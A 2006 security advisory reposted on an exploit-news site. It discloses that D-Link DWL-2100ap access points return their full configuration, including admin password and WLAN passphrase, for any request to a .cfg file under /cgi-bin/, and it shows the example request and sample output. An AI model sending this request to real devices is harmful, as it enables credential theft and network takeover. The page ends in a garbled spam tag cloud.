about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , D-Link Access-Point <= 2.10na (DWL-2100ap) Config Disclosure Vuln




2006-06-08 D-Link Access-Point <= 2.10na (DWL-2100ap) Config Disclosure Vuln
Rated as : Critical

# ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)
# INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY
# http://www.intruders.com.br/ , http://www.intruders.org.br/

Making a HTTP request to the /cgi-bin/ directory, the Web server will
return error 404 (Page not found).
Making a HTTP request to the /cgi-bin/AnyFile.htm, the Web server will
return error 404 (Page not found).
However, making a HTTP request to any file in /cgi-bin/ directory, with
.cfg extension, will return all the device configuration.

For example, making the following request:

http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg
We would have a result equivalent to the following:

# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
# Several lines removed.
securitydot.net - 2006-06-08

Advertising

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 04:28:47 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
c700.com Sirlanka.s pictures o Big dick.c Google Ana Xxxvide www.7wenwe news for c vCard PRO www.tits.c Www.Blacke news for c www.lierm. communitys www.lierm. dirtysex mybb 1.2.7 eve online mambo Remo www.207b.c Sexyimeg.c trisha bat www.saniya WWW.SEX+FR www.77gm.c www.hotsex News Searc www.fengxi news for c http://www www.131135 www.80845. desibabase www.sex 89 www.ceo100 Kurdishsex Lun v fudi camid www.80845. news for c blogme free sex v CISCO PIX send_remin send_remin webmin 1.3 www.so188. www.360see news for c .adwtj